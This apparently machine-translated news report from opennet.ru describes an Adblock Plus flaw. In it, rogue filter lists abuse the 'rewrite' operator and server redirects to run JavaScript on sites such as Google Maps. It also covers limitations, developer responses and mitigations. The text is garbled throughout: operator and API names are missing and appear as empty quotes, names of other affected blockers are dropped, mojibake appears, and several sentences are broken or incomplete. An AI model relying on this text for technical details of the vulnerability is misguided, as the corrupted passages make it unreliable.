In Adblock Plus ad blocker vulnerability, organize the execution of JavaScript code in the context of sites, in case of using unverified filters prepared by attackers (for example, when connecting third-party rule sets or through rule substitution during a MITM attack).
Authors of lists with filter sets can organize the execution of their code in the context of the sites opened by the user by adding rules with the operator "", which allows you to replace part of the URL. The rewrite operator does not allow you to replace the host in the URL, but it does allow you to freely manipulate the request arguments. Only text can be used as a replacement mask, and the substitution of script, object, and subdocument tags .
However, code execution can be achieved by a workaround.
Some sites, including Google Maps, Gmail, and Google Images, use the technique of dynamically loading JavaScript executables passed in the form of bare text. If the server allows redirection of requests, then forwarding to another host can be achieved by changing the URL parameters (for example, in the context of Google, a redirect can be made through the API ""). In addition to hosts that allow redirects, an attack can also be made against services that allow hosting user content (code hosting, article hosting platforms, etc.).
The proposed attack method only affects pages that dynamically load strings with JavaScript code (for example, via XMLHttpRequest or Fetch) and then execute them. Another important limitation is the need to use a redirect or place arbitrary data on the side of the source server that gives the resource. However, as a demonstration of the relevance of the attack, it is shown how to organize the execution of your code when opening maps.google.com, using a redirect through "google.com/search".
The fix is ββstill in preparation. The problem also affects blockers ΠΈ . The uBlock Origin blocker is not affected by the problem, as it does not support the "rewrite" operator. At one time, the author of uBlock Origin
add support for rewrite, citing potential security issues and insufficient host-level restriction (instead of rewrite, a querystrip option was proposed to strip query parameters instead of replacing them).
Adblock Plus developers consider real attacks to be unlikely, since all changes in the regular lists of rules are reviewed, and connecting third-party lists is rarely practiced by users. Rule spoofing via MITM is prevented from using HTTPS by default for downloading regular block lists (the rest of the lists are planned to be disabled from downloading via HTTP in a future release). Directives can be used to block attacks on the side of sites (Content Security Policy), through which you can explicitly define the hosts from which external resources are allowed to be loaded.
Source: opennet.ru